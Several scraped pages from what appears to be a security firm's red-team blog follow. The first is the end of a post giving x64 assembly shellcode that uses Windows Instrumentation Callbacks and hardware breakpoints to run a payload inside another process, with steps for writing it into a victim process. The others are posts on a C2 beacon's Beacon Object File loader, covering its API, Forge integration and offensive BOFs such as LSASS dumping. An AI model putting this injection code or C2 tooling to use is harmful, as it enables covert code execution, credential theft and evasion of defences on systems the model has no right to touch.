   mov r14, rdi ; rep stosq changes rdi, this is backup
   ; Zero CONTEXT struct
   mov rcx, 0x9a ; (4d0 / 8) --> amount of uint64_t's
   xor rax, rax
   rep stosq
   ; CONTEXT_DEBUG_REGISTERS
   mov dword [r14 + 0x30], 0x00100010
   ; GetCurrentThread() == -2
   xor rcx, rcx
   dec rcx
   dec rcx
   ; The saved CONTEXT base
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x6CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
   ; if return value == 0 it errored
   test rax, rax
   jz _set_dr_ret
   ; Set Dr3
   mov qword [r14 + 0x60], r13
   ; offsetof(CONTEXT, Dr7) = 0x70
   mov rcx, [r14 + 0x70]
   ; Clear Dr3 specific bits
   and rcx, ~((3 << 16) | (3 << 18) | (1 << 6)) 
   test rbx, rbx
   jz _skip_enable_bp
  ; Set local Dr3 enable (Execution type execute = 0 & length needs to be 0)   
  or rcx, (1 << 6) 
_skip_enable_bp:
   ; Dr7 = new Dr7
   mov [r14+0x70], rcx
   ; SetThreadContext
   xor rcx, rcx
   dec rcx
   dec rcx
   mov rdx, r14
   ; Shadow space
   sub rsp, 0x20
   ; GetThreadContext placeholder
   mov rdi, 0x5CCCCCCCCCCCCCCC
   call rdi
   add rsp, 0x20 ; Shadow space
_set_dr_ret:
   add rsp, 0x4d8 ; + 8 alignment
   pop rbx
   pop rdi
   pop r13
   pop r14
   ret

Flag helper functions

For the process-wide flag, we will use a placeholder (0x2CCCCCCCCCCCCCCC), which will be replaced at runtime. For the thread-local one, we will again use the Thread Environment Block. There are more unsuspicious ways of doing this.

load_bp_set_ptr_into_rcx:
; TEB 
mov rcx, gs:[30h]
; TEB->InstrumentationCallbackDisabled 
add rcx, 1b8h
ret
load_bitflag_into_rcx:
; rcx = pointer bit flag (placeholder currently)
mov rcx, 0x2CCCCCCCCCCCCCCC
ret

Execution logic

Looking back at the pseudo code, we got set_hwbp and remove_hwbp covered and now also got access to the two flag variables through the helper functions, so let’s get to implementing the core logic. I didn’t mention one requirement in the pseudo code: stack alignment. Callbacks aren’t always guaranteed to be aligned (RSP % 0x10 != 0, sometimes RSP % 0x10 = 8). To avoid issues, we are manually aligning the stack so all Windows API calls and also the payload call is 16 bytes aligned. So that the stack can be properly restored, we aren’t simply overwriting RSP but instead push a placeholder to check when returning if the stack was adjusted.

entry:
; The actual return address of the IC
push r10
push r14
mov r14, rsp
add r14, 0x10
push rax
push rcx
push rdx
; Rsp should be aligned for both cases, so it’s done here
mov rdx, rsp
and dl, 0xF
cmp dl, 0x8
jne _skip_align
mov rdx, 0xDEADBEEF
push rdx
_skip_align:
call load_bp_set_ptr_into_rcx
xor rax, rax
cmp [rcx], rax
je _hwbp_is_set
; “is_exception” check and payload execution
_hwbp_is_set:
; […]
_ret_unalign:
; Unalign rsp if it was previously modified
cmp dword [rsp], 0xDEADBEEF
jne _ret
add rsp, 8
_ret:
pop rdx
pop rcx
xor rcx, rcx
pop rax
pop r14
; r10 still on top of stack à return to it
ret

First execution

To follow the execution flow logically, let’s first cover what happens when an IC is first triggered in a thread (_first_execution_in_thread). Let’s look at the relevant excerpt from the pseudo code:

[…]
if (!payload_executed && !thread_set_hardware_bp) {
   thread_set_hardware_bp = true
   if (!set_hwbp(RtlExitUserThread)) // Does syscall
     thread_set_hardware_bp = false   
   return
}
[…]

The first line of this pseudo code was already partially written in the execution logic chapter. Only the first part of the if statement, whether the payload was executed or not, is missing. In addition to checking that, we need to set the flag that the hardware breakpoint was set to not call the IC recursively. If setting the HWBP wasn’t successful, the flag should be unset.

As we already wrote our helper functions to retrieve the flag addresses and set a breakpoint, this is simply a matter of combining things:

_hwbp_is_set:
call load_bitflag_into_rcx
xor rax, rax
inc rax
; Was payload already executed? If yes, don’t set BP
cmp [rcx], rax
je _ret_unalign
 ; Set BP set flag to avoid recursion
call load_bp_set_ptr_into_rcx
 xor rax, rax
inc rax
; bp set flag = 1
mov [rcx], rax
; RtlExitUserThread placeholder
mov rcx, 0x3CCCCCCCCCCCCCCC
xor rdx, rdx
inc rdx ; Enable hwbp
call set_dr
; Failed (rax != 0)?
test rax, rax
jnz _ret_unalign
;  bp set flag = 0 to retry on the next IC trigger
call load_bp_set_ptr_into_rcx
xor rax, rax
mov [rcx], rax
; Fall through on purpose to return
_ret_unalign
; […]

After HWBP was set

Let’s look back at the pseudo code for all this to function. We already wrote the code for the first execution within a thread and the logic to set a HWBP. All that’s left to do now is the following excerpt from the pseudo code:

bool payload_executed = false
bool thread_set_hardware_bp = false
callback(void* ic_origin) {
[…]
if (!is_exception(ic_origin))
   return
if (exception_origin != RtlExitUserThread)
   return
remove_hwbp(RtlExitUserThread) // Does syscall
if (!payload_executed) {
   payload_executed = true 
   execute_payload() // (Most likely) does syscall
}
restore_context()
}

We already implemented most of the required logic in the second part of this series – just in C++. If you are unsure how to detect whether the IC was triggered by a HWBP and how to restore execution after a HWBP was triggered, we recommend reading the second part of this series again and then returning to this point. We will, for example, not again explain how we know that we need to intercept KiUserThreadExceptionDispatcher.

Alright, back to coding:

; […]
; Check if the hardware breakpoint was triggered
; KiUserThreadExceptionDispatcher placeholder
   mov rcx, 0x4CCCCCCCCCCCCCCC
   cmp r10, rcx
   jne _ret_unalign
; r14 is still the top of the original stack
; this should be a CONTEXT*, if it is a nullptr its bad :)
   test r14, r14
   jz _ret_unalign
   ; Exception thrown, but is it ours?
   ; RtlExitUserThread placeholder
   mov r10, 0x3CCCCCCCCCCCCCCC
   mov rcx, [r14+0xf8]
   cmp r10, rcx
   ; Not our exception
   jne _ret_unalign
   ; Unset bp
   xor rcx, rcx
   xor rdx, rdx
   call set_dr
   call load_bitflag_into_rcx
   ; Save context base
   push r14
   ; payload was already executed
   cmp qword [rcx], 1
   je _restore_context
   ; Set payload executed flag
   mov qword [rcx], 1
   sub rsp, 0x20
   call payload
   add rsp, 0x20
   ; as you can see, the payload needs to not mangle the stack
   ; otherwise it should call RtlExitUserThread itself
   ; if it mangled the stack rcx wouldn’t be the context base in the next line
_restore_context:
   ; Restore context base to rcx     
   pop rcx
   ; Set ResumeFlag in EFlags register
   or dword [rcx+0x44], 0x10000
   ; ExceptionRecord = nullptr
   xor rdx, rdx
   ; Call RtlRestoreContext
   sub rsp, 0x20
   mov rdi, 0x8CCCCCCCCCCCCCCC
   call rdi
   ; RtlRestoreContext doesn’t return

If you were a careful reader and/or followed along and tried to assemble the code yourself, you might’ve noticed that the ‘payload’ label is missing. Where does it come from? Easy, we just added the payload label at the end of all our code to use a relative reference. That way we can just add the payload to the end of the payload wrapper and it will be able to execute the payload, even if the payload and the wrapper were assembled separately and the byte arrays were just added to each other.

If you made it this far and understood what we were doing, congrats! You’ve pulled through, now we can finally transition back to C++.

C++ code

If you followed our recommendation of using CMake/a build system with prebuild steps to assemble the assembly for you and transform it to a byte array, you should most likely have two arrays now: one for your payload and one for the wrapper. If you only got one fixed payload you always want to use after compilation, you could of course also directly assemble both the payload and the wrapper together or directly copy them together with prebuild steps.

Now you need to replace the placeholders in that/those byte arrays. You could of course also add a PEB walk to dynamically retrieve the required function addresses and not use placeholders; we decided against this for our wrapper for size reasons and to keep the blog post brief.

Talking about that, the blog post is already pretty long so we’ve decided to not add any of our C++ code 😉. If you understood the blog series so far, searching for 8-byte numbers in a byte array and replacing them should be an easy task for you. If you go through the assembly again, you will need to replace the placeholders 0x2CCCCCCCCCCCCCCC till 0x8CCCCCCCCCCCCCCC. The placeholders are commented with what function they require. The flag placeholder simply requires a 1-byte allocation with read and write permissions in the target process.

After replacing the placeholders and adding them to one array/vector, that data needs to be written to an executable memory region in the victim process. For this, obviously an opened handle is required that allows memory writing and memory allocations if any allocations are done. After the shellcode was copied over, an IC needs to be set on the other process with the callback being specified as the start of the copied shellcode. For this, a handle with the PROCESS_SET_INFORMATION access mask is required. Keep in mind that you require the SeDebugPrivilege to set an IC onto another process. You can, for example, start your program from an administrative PowerShell.

Closing words

In this blog post you learned how to write the shellcode required to inject shellcode into another process with ICs. You hopefully also managed to write the required C++ code yourself. This is of course not the only way to utilize ICs for injections. To my knowledge ICs are the most powerful feature of Windows usable in user mode. In general, we only covered a fraction of what is possible with ICs, for example we haven’t covered getting callbacks to APCs with them.

ICs aren’t only usable in offensive ways though; they are, for example, also very interesting for EDRs and anti-cheats.

Three parts of this series were about mainly offensive use cases of ICs. In the next and last part of this series, we will discuss ICs from a more defensive standpoint: how they can be detected and how to detect if someone overwrote your IC.

Further blog articles

AD Security

Microsoft Defender for Identity evasions in 2026 – Part II

June 17, 2026 – The first blogpost highlighted the detection capabilities and the resulting evasion options for Microsoft Defender for Identity (DfI). To complement the first part, the second part will present some alternative detection possibilities for the defensive side to improve visibility and security, as well as the upgrade from DfI version 2.2 to DfI version 3.0.

Author: Jakob Scholz

Mehr Infos »
Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Beacon Object Files for Mythic – Part 3

Search

Beacon Object Files for Mythic – Part 3

Dezember 4, 2025

Beacon Object Files for Mythic: Enhancing Command and Control Frameworks – Part 3

This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

The blog post series accompanies the master’s thesis “Enhancing Command & Control Capabilities: Integrating Cobalt Strike’s Plugin System into a Mythic-based Beacon Developed at cirosec” by Leon Schmidt and the related source code release of our BOF loader.

Goals of our BOF runtime

As mentioned in the first part of this blog post series, several BOF loader implementations already exist. The best known is probably the COFF loader from TrustedSec (despite its name, the loader is fully able to run Cobalt Strike BOFs).

However, this loader was not usable for us for various reasons. Our own Mythic beacon has the peculiarity that it is built entirely as shellcode, which brought several disadvantages with it:

  • The C standard library cannot be used (just like it is in BOFs and for the same reason: the linking step is missing in shellcode projects as well).
  • The Windows APIs can only be accessed indirectly – a simple #include <Windows.h> and direct calls to the functions are not possible.
  • Simple use of the process heap is not possible – memory always must be reserved and managed manually.

The COFF loader is based on all three of these features. Our task is therefore to build a loader that also complies with these restrictions. This will allow us to use it in our Mythic beacon. At the same time, we also increase compatibility with other projects in the offensive security field, which are often subject to the same restrictions. This means that we must observe the following:

  • No functions from the C standard library may be used unless the compiler (in our case clang-cl) provides intrinsics for them.
  • The use of Windows APIs should be kept to a minimum. If they are required for a specific task, they must be passed as function pointers by the caller of the loader. This means that the caller is responsible for determining how to resolve the functions.
  • Memory management functions must also be passed by the caller. This allows the caller to define the memory management mechanics itself. The loader will not be able to function completely without memory allocations.
  • The Beacon API functions should also be implemented and passed by the caller, as their implementation sometimes includes system-specific features. It cannot be verified that the caller supports these.
  • The parameters for the BOF must be passed in the form of the size-prefixed binary blob, exactly as Cobalt Strike does. This ensures that the Data Parser API can correctly work with it. The binary blob must be created by the caller.

In the following sections, we describe how we achieved these goals. We have published our BOF loader at https://github.com/cirosec/bof-loader. It is therefore a good idea to look for the relevant code sections there to accompany this blog post. The included “TestMain” project implements the BOF loader exemplary, while the “BOFLoader” project includes, well, the BOF loader.

Implementation of our BOF loader

Preventing the usage of the standard library and Windows API

First, we need to get rid of some standard library calls and look for alternatives, especially those for string manipulation and memory management. memcpy and memset can be easily reimplemented manually (see BOFLoader/Memory.cpp). However, we need some help with allocation and deallocation: Here we use VirtualAlloc and HeapAlloc as well as VirtualFree and HeapFree from the Windows API. For HeapAlloc and HeapFree, we also need GetProcessHeap. These five functions can therefore be added to the list of functions that must be passed by the caller.

Regarding string manipulation, we can implement the functions strlen, strncmp, strncpy, strtok_r and strtol ourselves (see BOFLoader/StringManipulation.cpp). The string tokenizer strtok_r, which may be somewhat unusual in this list, is needed for the implementation of Dynamic Function Resolution (DFR) to split the string at the $ character (see the first blog post on this topic). The rest of the functions are needed from time to time, e.g., to process section or symbol names.

That almost checks off the first item from our requirements list. We still need the four Windows API functions that are linked to the BOF by default because our loader needs to know them too: LoadLibraryA, GetModuleHandleA, GetProcAddress and FreeLibrary. We’ll now define function types for all of these functions so that the caller knows which function signatures to comply with. We also want to leave it up to the caller to decide how DFR should resolve functions. To do this, we additionally define the function type ResolveFunc_t, which takes the library name and function name as parameters of type const char* and should return the function pointer as void*.

We call all these functions external functions, for which we define a struct that is used to hold the pointers to them. The definitions for them look like this:

#include "wintypes.h" // for Windows types (e.g. HANDLE, LPVOID, etc.)

typedef LPVOID(__stdcall* VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL(__stdcall* VirtualFree_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
typedef LPVOID(__stdcall* HeapAlloc_t)(HANDLE hHeap, DWORD wFlags, SIZE_T dwBytes);
typedef BOOL(__stdcall* HeapFree_t)(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);
typedef HANDLE(__stdcall* GetProcessHeap_t)();

// These functions are the ones that are injected to a BOF by default
typedef HMODULE(*LoadLibraryA_t)(LPCSTR lpLibFilename);
typedef HMODULE(*GetModuleHandleA_t)(LPCSTR lpModuleName);
typedef FARPROC(*GetProcAddress_t)(HMODULE hModule, LPCSTR lpProcName);
typedef BOOL(*FreeLibrary_t)(HMODULE hLibModule);

// DFR resolve function
typedef void*(*ResolveFunc_t)(const char* lib, const char* func);

typedef struct external_functions {
    VirtualAlloc_t VirtualAlloc;
    VirtualFree_t VirtualFree;
    HeapAlloc_t HeapAlloc;
    HeapFree_t HeapFree;
    GetProcessHeap_t GetProcessHeap;
    LoadLibraryA_t LoadLibraryA;
    GetModuleHandleA_t GetModuleHandleA;
    GetProcAddress_t GetProcAddress;
    FreeLibrary_t FreeLibrary;
    ResolveFunc_t ResolveFunc;
} external_functions_t, * external_functions_ptr_t;

Consultant

Category
Date
Navigation

Passing the Beacon API functions

We must do the same with the Beacon APIs. They also have to be implemented by the caller. In addition to the frequently used Data Parser, Format and Output APIs, we have also implemented the Token and Utility APIs, as their implementations are relatively simple. Then we define the function types and the struct to hold them again. We call those functions the Cobalt Strike Compatibility Functions (cs_compat_functions).

#include "wintypes.h" // for Windows types (e.g. HANDLE, LPVOID, etc.)

typedef struct {
    char* original;
    char* buffer;
    int   length;
    int   size;
} datap_t;

typedef struct {
    char* original; // the original buffer
    char* buffer;   // current pointer into our buffer
    int   length;    // remaining length of data
    int   size;        // total size of this buffer
} formatp_t;

// Data Parser API
typedef void (*BeaconDataParse_t)(datap_t* parser, char* buffer, int size);
typedef int (*BeaconDataInt_t)(datap_t* parser);
typedef short (*BeaconDataShort_t)(datap_t* parser);
typedef int (*BeaconDataLength_t)(datap_t* parser);
typedef char* (*BeaconDataExtract_t)(datap_t* parser, int* size);

// Format API
typedef void (*BeaconFormatAlloc_t)(formatp_t* format, int maxsz);
typedef void (*BeaconFormatReset_t)(formatp_t* format);
typedef void (*BeaconFormatFree_t)(formatp_t* format);
typedef void (*BeaconFormatAppend_t)(formatp_t* format, char* text, int len);
typedef void (*BeaconFormatPrintf_t)(formatp_t* format, char* fmt, ...);
typedef char* (*BeaconFormatToString_t)(formatp_t* format, int* size);
typedef void (*BeaconFormatInt_t)(formatp_t* format, int value);

// Output API
typedef void (*BeaconPrintf_t)(int type, char* fmt, ...);
typedef void (*BeaconOutput_t)(int type, char* data, int len);

// Token API
typedef BOOL (*BeaconUseToken_t)(HANDLE token);
typedef void (*BeaconRevertToken_t)(void);
typedef BOOL (*BeaconIsAdmin_t)(void);

// Utility API
typedef BOOL (*toWideChar_t)(char* src, wchar_t* dst, int max);
typedef struct cs_compat_functions {
    // Data Parser API
    BeaconDataParse_t BeaconDataParse;
    BeaconDataInt_t BeaconDataInt;
    BeaconDataShort_t BeaconDataShort;
    BeaconDataLength_t BeaconDataLength;
    BeaconDataExtract_t BeaconDataExtract;

    // Format API
    BeaconFormatAlloc_t BeaconFormatAlloc;
    BeaconFormatReset_t BeaconFormatReset;
    BeaconFormatFree_t BeaconFormatFree;
    BeaconFormatAppend_t BeaconFormatAppend;
    BeaconFormatPrintf_t BeaconFormatPrintf;
    BeaconFormatToString_t BeaconFormatToString;
    BeaconFormatInt_t BeaconFormatInt;

    // Output API
    BeaconPrintf_t BeaconPrintf;
    BeaconOutput_t BeaconOutput;

    // Token API
    BeaconUseToken_t BeaconUseToken;
    BeaconRevertToken_t BeaconRevertToken;
    BeaconIsAdmin_t BeaconIsAdmin;

    // Utility API
    toWideChar_t toWideChar;
} cs_compat_functions_t, * cs_compat_functions_ptr_t;

This means, we have already fulfilled four out of five of the requirements. We still need to package all this in a format that is suitable for the caller: the public API for the BOF loader.

Definition of the public API

The public API should typically consist of a single public function: RunBOF. This function requires the following information:

  • Pointer to the struct containing the external functions (required by the loader itself and for linking them into the BOF)
  • Pointer to the struct containing the Beacon API functions (only for linking them into the BOF)
  • The name of the entry point function in the BOF (by convention go, similar to main in executable programs)
  • The BOF itself as well as its size
  • The binary blob with the parameters for the BOF as well as its size

This results in the following function signature:

int RunBOF(
    external_functions_ptr_t external_functions,
    cs_compat_functions_ptr_t compat_functions,
    char* functionname,
    unsigned char* coff_data, uint32_t filesize,
    unsigned char* argument_data, int argument_size
)

Because it makes things easier, we will add a second function, UnhexlifyArgs, which converts the parameter Binary Blob from a string into raw bytes. The string is either generated by Mythic or can be generated manually using TrustedSec’s beacon_generate.py script. The signature of UnhexlifyArgs then looks like this:

unsigned char* UnhexlifyArgs(
    external_functions_ptr_t external_functions,
    unsigned char* value,
    int* outlen
)

UnhexlifyArgs also requires the external functions, e.g., for strlen and HeapAlloc.

This means that we have fulfilled all requirements and received all necessary functions from the caller. All that is missing now is the actual implementation of the linking process and DFR.

Doing all the heavy linking and DFR

We have already discussed the theory of how linking must take place in the first part of this blog post series. There is not much magic going to happen here. That is why we will take a high-level look at what the BOF loader does.

First, we read the BOF’s file header. Then we allocate an array sectionMapping, which later tracks the contents of each section and performs the relocations in there. In preparation, we iterate over all section headers, count the number of necessary relocations and copy the section data into the sectionMapping. We then iterate over the sections a second time, but now to actually perform the relocations. For each relocation entry, we determine whether the symbol in question is an internal or external symbol. This is important here for two reasons: First, different relocation types are used for different symbol types. To avoid having to implement all of them (some of which have even been deprecated for decades and are no longer used), we make this distinction here. Second, we have to resolve external symbols ourselves in order to place DFR functions or the Beacon APIs there.

In two large if / else if control structures (one for internal and external symbols), we check the corresponding requested relocation type. For internal symbols, the BOF loader supports these relocation types:

  • IMAGE_REL_AMD64_ADDR64
  • IMAGE_REL_AMD64_ADDR32NB
  • IMAGE_REL_AMD64_REL32
  • IMAGE_REL_AMD64_REL32_1
  • IMAGE_REL_AMD64_REL32_2
  • IMAGE_REL_AMD64_REL32_3
  • IMAGE_REL_AMD64_REL32_4
  • IMAGE_REL_AMD64_REL32_5
  • IMAGE_REL_I386_DIR32
  • IMAGE_REL_I386_REL32

The following relocation types are supported for external symbols:

  • IMAGE_REL_AMD64_ADDR64
  • IMAGE_REL_AMD64_REL32 (this is the type used for function relocations)
  • IMAGE_REL_AMD64_ADDR32NB
  • IMAGE_REL_I386_DIR32
  • IMAGE_REL_I386_DIR32
  • IMAGE_REL_I386_REL32

However, before we relocate the external symbol we are currently processing, we first need to find the relocation target of the symbol, i.e., one of the corresponding function pointers that was provided to the loader by the caller. To do this, we use the helper function process_symbol. It receives the raw symbol name and first removes the platform-dependent prefix (__imp__ or __imp_). It then checks whether the remainder of the name references a Beacon API function or one of the four given reloading functions. If that’s the case, the function pointer is known (as it was provided by the caller) and can be returned from the process_symbol function directly. If not, we can be almost certain that it is a DFR symbol. Hence, we use the self-implemented string tokenizer to split the symbol string at the $ character and pass the parts (library and function name) to the ResolvFunc, also provided by the caller. We then (hopefully) receive our function pointer from it, which we can use for relocation. After the process_symbol function returned, we can use the resulting address and perform the relocation according to the wanted relocation type.

We now repeat this process for each section and each relocation within this section. A single error in this process stops the BOF from being invoked, as a single byte too far or too short in a relocation offset will eventually cause the BOF to crash anyway. Due to the lack of the fork-and-run principle, this also means that our beacon would crash, as the BOF runs within the same execution path.

Now all that’s left is to implement the server-side component in Mythic.

Adding the server-side Mythic implementation

We cannot publish the server-side implementation because it is too closely linked to our beacon. However, it is not really difficult to do it yourself. To use the BOF loader in the beacon, you only need to assign a new command in the Mythic payload container, which is then used to call the loader, e.g., execute_bof. This command only requires a file parameter for the BOF itself and a parameter of type “typed array,” which is used for parameterizing the BOF. We will explain why this typed array is important in more detail shortly. Optionally, the name of the entry point function (if different from go) and a chunk size for the transfer of the BOF file can be specified as parameters for the execute_bof command. You can read more about how to add new commands in Mythic, but if you have your own beacon, you should already be familiar with this: https://docs.mythic-c2.net/customizing/payload-type-development/adding-commands/commands

Depending on the setup, the translator may need to be adjusted to support Mythic’s typed array type, as it is still quite new. But otherwise, the Mythic implementation is now complete. This is what the parameter UI for the new command in Mythic looks like:

Figure 1: Parameter UI for the new execute_bof command in Mythic

Bonus: Achieving compatibility with Mythic’s Forge

The beacon and Mythic are now able to handle BOFs. However, there is still one thing missing, which other C2 frameworks were unable to resolve yet, preventing the use of certain BOFs: circumventing Aggressor Script.

On February 5, 2025, Cody Thomas (@its_a_feature_), the developer behind Mythic, announced a new plug-in called Forge. At first glance, it was described as a way to “standardize BOF/.NET execution within Mythic Agents.” But on closer inspection, Forge isn’t a universal runtime, really. Instead, it serves two key purposes: abstraction and library management.

Forge provides an operator interface for running BOFs and .NET assemblies. It doesn’t execute them directly but translates Mythic input into the correct invocation commands for each supported beacon (which would be execute_bof in our case). This means that each beacon must still provide its own BOF runtime, but Forge takes care of calling conventions through Mythic’s new “Command Augmentation” feature, which was introduced in version 3.3. Out of the box, Forge supports the official beacons Apollo and Athena.

Forge also integrates with tool collections like the Sliver Armory for BOFs and SharpCollection for .NET assemblies. These are indexes that provide direct download URLs to the payloads. Since we do not need .NET execution for now, we’re going to ignore the SharpCollection. Forge works perfectly fine with just BOFs.

The Sliver Armory is used as a package index for BOFs used in the Sliver C2 framework. Forge is now making it available to use for Mythic as well. For operators, this means easy access to a curated, pre-adapted BOF index. Additionally, the BOFs in this index are adjusted to remove the Aggressor Script dependency as well as possible! This means, no more hunting down scripts, patching Aggressor Script dependencies or manually compiling the BOFs. You just have a list of everything that is available and usable with Mythic, well, within Mythic:

Figure 2: Forge’s forge_collections command to list and manage registered BOFs (here: removing the “Reg Query” BOF)

After registering a BOF in Forge, it becomes available as a new callback command, e.g. forge_bof_sa-reg-query for the Reg Query BOF from the Situational Awareness collection. Metadata is also provided for each BOF, such as which parameters the BOF requires. With manual execution, you would have to find the required parameters out and also encode them yourself. This is prone to errors: Incorrect parameter passing can lead to a crash in the implementation of the Data Parser Beacon API and thus also to a crash of the beacon.

Forge displays these BOF parameters directly in Mythic, as it does for built-in commands, within the parameter UI:

Figure 3: Forge’s parameter UI for the Reg Query BOF

In practice, Forge eliminates a lot of steps:

  • Searching external sources for (working) BOFs
  • Modifying them to run without Aggressor Script
  • Compiling and uploading them to the Mythic server manually
  • Encoding parameters by hand

In order to make our own beacon compatible with Mythic alongside Athena and Apollo, only a single file in Forge needs to be modified: the payload_type_support.json. It contains the configuration of Forge’s abstraction layer for each payload type (aka beacon). All that needs to be done is specify the target commands for invoking the BOF loader as well as some of the parameters for it that are then populated by Forge. This includes the names of the file parameter, the entry point parameter (this is also abstracted by the BOF metadata stored in the corresponding index) and the parameter in which the BOF arguments are passed. We will leave the fields for .NET execution blank for now, as we do not want to use this feature:

[
    <other payload types>,
    {
        "agent": "cirosec-beacon",
        "bof_command": "execute_bof",
        "bof_file_parameter_name": "file",
        "bof_argument_array_parameter_name": "args_array",
        "bof_entrypoint_parameter_name": "function_name",
        "inline_assembly_command": "",
        "inline_assembly_file_parameter_name": "",
        "inline_assembly_argument_parameter_name": "",
        "execute_assembly_command": "",
        "execute_assembly_file_parameter_name": "",
        "execute_assembly_argument_parameter_name": ""
    }
]

All parameters must, of course, be configured so that they can accept data populated by Forge: The file parameter must be of type “file,” the entry point is passed as a “string” and the BOF arguments as a “typed array” as we have mentioned above. The parameters for the Reg Query BOF shown in Figure 7 would then be passed as follows:

[
    ["z", "CODE-LSC"],
    ["i", 1],
    ["z", "\Environment"],
    ["z", "PATH"],
    ["i", 0]
]

Here, the five parameters “hostname”, “hive”, “path”, “key” and “recursive” are specified in order. This format is specific to Mythic and Forge, but the type constants come from Cobalt Strike. In this case, “z” stands for “string” (while a capital “Z” would mean a wide string) and “i” is a 4-byte integer. The constants can be found in the Cobalt Strike documentation and must be understood by our BOF loader command for Forge to properly work. But since we have already implemented this, we are done here!

Now that Forge knows about our beacon configuration, we need to rebuild the Forge container, and we can start registering BOFs for our beacon. Since the commands and registrations only exist on the server side, they are also globally available for all callbacks without us having to touch the already deployed beacons.

Summing up – What now?

The characteristics of BOFs makes red team operations much easier. The defending/attacked side in turn has a much harder time: Even if they have found and reverse-engineered one of our beacons, they cannot determine what it is capable of due to the BOFs not being included within it. We now have the ability to introduce arbitrary code into each and every environment in which our beacon runs at every time we want.

We are currently in the process of building our own BOF index based on Forge. This will enable us to achieve even greater runtime stability and allows our malware developers to contribute their own BOF implementations, which we can use directly in our red teaming operations. The possibilities are endless from now on. We have also fed back the changes we made to Forge upstream and hope to see further developments in this area.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Beacon Object Files for Mythic – Part 2

Search

Beacon Object Files for Mythic – Part 2

November 27, 2025

Beacon Object Files for Mythic: Enhancing Command and Control Frameworks – Part 2

This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

The blog post series accompanies the master’s thesis “Enhancing Command & Control Capabilities: Integrating Cobalt Strike’s Plugin System into a Mythic-based Beacon Developed at cirosec” by Leon Schmidt and the related source code release of our BOF loader.

Gathering a BOF Test Collection

As part of the development of our BOF loader, we had to look at how the BOFs we want to use with it in the future use the Beacon APIs, Aggressor Script and DFR. To do this, we put together a small collection of tests that are also great for showing what BOFs can do.

We searched GitHub for BOF repositories with as many stars as possible. This resulted in the following list of BOFs (you can safely skip this chapter if you are not interested in the individual BOFs):

fortra/nanodump

NanoDump is a powerful tool designed to create minidumps of the Local Security Authority Subsystem Service (LSASS) with the flexibility to adapt to various operational scenarios. It provides multiple methods to handle the dumping process, offering both direct and indirect techniques to obtain LSASS handles securely and covertly. Operators can choose to write the dump to a specified file path or create a valid signature for the dump to avoid detection. The tool supports advanced methods such as duplicating or elevating existing LSASS handles, leveraging the Seclogon service to leak or duplicate handles and using spoofed call stacks to evade security mechanisms. Additionally, NanoDump enables indirect dumping through external processes like WerFault.exe, which can be triggered using features such as SilentProcessExit or the Shtinkering technique.

trustedsec/CS-Situational-Awareness-BOF

Contrary to its name, CS-Situational-Awareness-BOF is not a single BOF but a collection of smaller BOFs for situational awareness, created by TrustedSec. There are BOFs for enumerating certificates, querying the local ARP table, sending LDAP queries to the local Active Directory, displaying the visible windows in the current user session and much more. With many of the functions, individual commands of a Windows CMD can be retrofitted in the form of BOFs. As this collection covers the situational awareness area quite comprehensively, this project is probably one of the most important in terms of BOFs.

trustedsec/CS-Remote-OPs-BOF

CS-Remote-OPs-BOF again is a collection of BOFs developed by TrustedSec, complementing its earlier Situational Awareness BOF collection by introducing tools that modify system states, enabling a broader range of offensive security tasks. The BOFs included in this collection cover fundamental Windows operations, such as managing services, registry keys, scheduled tasks and user accounts. Additionally, the repository offers BOFs for process management, including dumping process memory and handling process states. Recognizing the importance of stealth and evasion, TrustedSec has also included injection BOFs used in EDR testing. While these are provided without support, they serve as valuable resources for understanding and implementing code injection techniques. This collection is probably as important as CS-Situational-Awareness-BOF for red team operations.

anthemtotheego/InlineExecute-Assembly

InlineExecute-Assembly is a PoC BOF developed to facilitate in-process execution of .NET assemblies. This approach serves as an alternative to Cobalt Strike’s traditional execute-assembly module, which typically employs a fork-and-run technique. By executing .NET assemblies directly within the current beacon process, InlineExecute-Assembly eliminates the need to spawn sacrificial processes, thereby reducing the operational footprint and enhancing stealth during engagements. The tool is designed to handle assemblies with entry points defined as Main(string[] args) or Main(), allowing for the execution of most existing .NET tools without requiring modifications. It does this by automatically determining and loading the appropriate CLR version before execution.

GhostPack/Koh

